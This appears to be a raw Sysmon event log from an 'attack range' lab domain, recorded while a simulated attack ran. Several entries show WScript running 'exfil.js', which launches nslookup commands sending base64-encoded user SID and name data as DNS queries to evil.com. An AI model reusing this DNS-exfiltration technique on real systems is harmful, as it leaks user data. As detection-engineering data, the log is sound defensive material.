14:16:21.011{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-413F-000000005F02}6448C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.011{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-413F-000000005F02}6448C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.011{2E1864BB-17B4-629A-413F-000000005F02}64484040C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-403F-000000005F02}7396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043926Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:21.745{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44B472CF597C2ACB1A436FBE7194FD34,SHA256=144EC5F96E84E91152CB2976051A6FBC5EDAB6E5C0333BF8E4A5233F5F9242A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.988{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-683F-000000005F02}5584C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.988{2E1864BB-17A1-629A-783D-000000005F02}55523736C:\Windows\System32\WScript.exe{2E1864BB-17B6-629A-683F-000000005F02}5584C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.988{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.988{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.988{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.988{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.992{2E1864BB-17B6-629A-683F-000000005F02}5584C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlszp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.986{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhxiqpx.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.936{2E1864BB-17B6-629A-663F-000000005F02}64962040C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-673F-000000005F02}6488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.936{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.936{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.936{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.936{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.936{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-673F-000000005F02}6488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.936{2E1864BB-17B6-629A-653F-000000005F02}53927412C:\Windows\system32\cmd.exe{2E1864BB-17B6-629A-673F-000000005F02}6488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.947{2E1864BB-17B6-629A-673F-000000005F02}6488C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B6-629A-653F-000000005F02}5392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhxiqpx.tmp 2>&1 10341000x8000000000000000197871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.905{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-663F-000000005F02}6496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.905{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-663F-000000005F02}6496C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.889{2E1864BB-17B6-629A-663F-000000005F02}64962040C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-653F-000000005F02}5392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.888{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-663F-000000005F02}6496C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.868{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.868{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.868{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.868{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.868{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-653F-000000005F02}5392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.868{2E1864BB-17A1-629A-783D-000000005F02}55524760C:\Windows\System32\WScript.exe{2E1864BB-17B6-629A-653F-000000005F02}5392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.873{2E1864BB-17B6-629A-653F-000000005F02}5392C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhxiqpx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.868{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgfqtkb.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 